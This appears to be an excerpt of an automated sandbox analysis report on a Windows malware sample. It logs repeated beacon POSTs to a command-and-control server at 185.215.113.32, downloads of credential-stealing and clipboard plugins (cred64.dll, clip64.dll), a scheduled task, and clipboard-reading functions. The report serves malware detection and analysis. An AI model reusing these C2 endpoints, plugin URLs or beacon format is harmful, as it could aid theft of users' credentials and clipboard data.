Source: global traffic	HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 185.215.113.32 185.215.113.32
Source: Joe Sandbox View	IP Address: 185.215.113.32 185.215.113.32

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.32

Source: C:\Users\user\Desktop\wIaKimJFke.exe

Code function: 0_2_004EC990 recv,recv,recv,recv,

0_2_004EC990

Source: global traffic	HTTP traffic detected: GET /yandex/Plugins/cred64.dll HTTP/1.1Host: 185.215.113.32
Source: global traffic	HTTP traffic detected: GET /yandex/Plugins/clip64.dll HTTP/1.1Host: 185.215.113.32

Source: unknown

HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

Source: explorgu.exe, 00000005.00000002.2870677611.0000000001106000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.32/
Source: explorgu.exe, 00000005.00000002.2870677611.0000000001106000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.32/ws
Source: explorgu.exe, 00000005.00000002.2870677611.0000000001106000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.32/yandex/Plugins/clip64.dll
Source: explorgu.exe, 00000005.00000002.2870677611.0000000001106000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.32/yandex/Plugins/clip64.dll&
Source: explorgu.exe, 00000005.00000002.2870677611.0000000001106000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.32/yandex/Plugins/clip64.dll1
Source: explorgu.exe, 00000005.00000002.2870677611.00000000010D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.32/yandex/Plugins/cred64.dll
Source: explorgu.exe, 00000005.00000002.2870677611.00000000010D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.32/yandex/Plugins/cred64.dll2
Source: explorgu.exe, 00000005.00000002.2870677611.0000000001106000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2064247735.0000029F08E49000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.2869541490.000000000332A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.2869541490.000000000336E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.32/yandex/index.php
Source: explorgu.exe, 00000005.00000002.2870677611.00000000010D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.32/yandex/index.php%
Source: explorgu.exe, 00000005.00000002.2870677611.0000000001106000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.32/yandex/index.php2ab05
Source: explorgu.exe, 00000005.00000002.2870677611.0000000001106000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.32/yandex/index.php:10
Source: rundll32.exe, 00000007.00000002.2064247735.0000029F08E72000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.32/yandex/index.php?wal=1
Source: rundll32.exe, 00000007.00000002.2064510181.0000029F0AE32000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.32/yandex/index.php?wal=1&
Source: rundll32.exe, 00000007.00000002.2064510181.0000029F0AE32000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.32/yandex/index.php?wal=1r
Source: rundll32.exe, 00000007.00000002.2064510181.0000029F0AE32000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.32/yandex/index.php?wal=1tesf
Source: explorgu.exe, 00000005.00000002.2870677611.00000000010F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.32/yandex/index.phpK
Source: rundll32.exe, 00000007.00000002.2064247735.0000029F08E49000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.32/yandex/index.phpVl
Source: explorgu.exe, 00000005.00000002.2870677611.0000000001106000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.32/yandex/index.phpWindows
Source: explorgu.exe, 00000005.00000002.2870677611.0000000001106000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.32/yandex/index.phpa
Source: explorgu.exe, 00000005.00000002.2870677611.0000000001106000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.32/yandex/index.phpa0
Source: explorgu.exe, 00000005.00000002.2870677611.0000000001106000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.32/yandex/index.phpa2ab05
Source: explorgu.exe, 00000005.00000002.2870677611.00000000010F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.32/yandex/index.phpg
Source: explorgu.exe, 00000005.00000002.2870677611.00000000010A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.32/yandex/index.phpn
Source: explorgu.exe, 00000005.00000002.2870677611.0000000001106000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.32/yandex/index.phpp
Source: explorgu.exe, 00000005.00000002.2870677611.0000000001106000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.32/yandex/index.phprsion
Source: explorgu.exe, 00000005.00000002.2870677611.00000000010F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.32/yandex/index.phpu
Source: explorgu.exe, 00000005.00000002.2870677611.0000000001106000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.32/yandex/index.phpx
Source: powershell.exe, 0000000B.00000002.2047365994.0000020057384000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2031780544.0000020048BEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000B.00000002.2031780544.0000020047538000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000B.00000002.2031780544.0000020047538000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 0000000B.00000002.2031780544.0000020047311000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000B.00000002.2031780544.0000020047538000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000B.00000002.2031780544.0000020047538000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000B.00000002.2031780544.0000020047311000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000B.00000002.2031780544.0000020047538000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 0000000B.00000002.2031780544.000002004893F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
Source: powershell.exe, 0000000B.00000002.2031780544.0000020048BEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000B.00000002.2031780544.0000020048BEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000B.00000002.2031780544.0000020048BEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000B.00000002.2031780544.0000020047538000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000B.00000002.2050170977.000002005F3BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://go.microsoft.co
Source: powershell.exe, 0000000B.00000002.2047365994.0000020057384000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2031780544.0000020048BEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Contains functionality for read data from the clipboard

Source: C:\Windows\SysWOW64\rundll32.exe

10_2_6E222580

Contains functionality to read the clipboard data

Source: C:\Windows\SysWOW64\rundll32.exe

10_2_6E222580

System Summary

PE file contains section with special chars

Source: wIaKimJFke.exe	Static PE information: section name:
Source: wIaKimJFke.exe	Static PE information: section name: .idata
Source: wIaKimJFke.exe	Static PE information: section name:
Source: explorgu.exe.0.dr	Static PE information: section name:
Source: explorgu.exe.0.dr	Static PE information: section name: .idata
Source: explorgu.exe.0.dr	Static PE information: section name:

Abnormal high CPU Usage

Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe

Process Stats: CPU usage > 49%

Creates files inside the system directory

Source: C:\Users\user\Desktop\wIaKimJFke.exe

File created: C:\Windows\Tasks\explorgu.job

Jump to behavior

Detected potential crypto function

Source: C:\Users\user\Desktop\wIaKimJFke.exe	Code function: 0_2_0052707B	0_2_0052707B
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Code function: 0_2_00526809	0_2_00526809
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Code function: 0_2_005224D0	0_2_005224D0
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Code function: 0_2_004E60E0	0_2_004E60E0
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Code function: 0_2_00522968	0_2_00522968
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Code function: 0_2_00527EB0	0_2_00527EB0
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Code function: 0_2_00526F5B	0_2_00526F5B
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Code function: 0_2_00517780	0_2_00517780
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Code function: 5_2_002E6809	5_2_002E6809
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Code function: 5_2_002E707B	5_2_002E707B
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Code function: 5_2_002E24D0	5_2_002E24D0
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Code function: 5_2_002E2968	5_2_002E2968
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Code function: 5_2_002E7EB0	5_2_002E7EB0
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Code function: 5_2_002E6F5B	5_2_002E6F5B
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Code function: 5_2_002D7780	5_2_002D7780
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_6E222580	10_2_6E222580
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_6E231701	10_2_6E231701
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFD9B7177F8	11_2_00007FFD9B7177F8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFD9B7D7732	11_2_00007FFD9B7D7732

Dropped file seen in connection with other malware

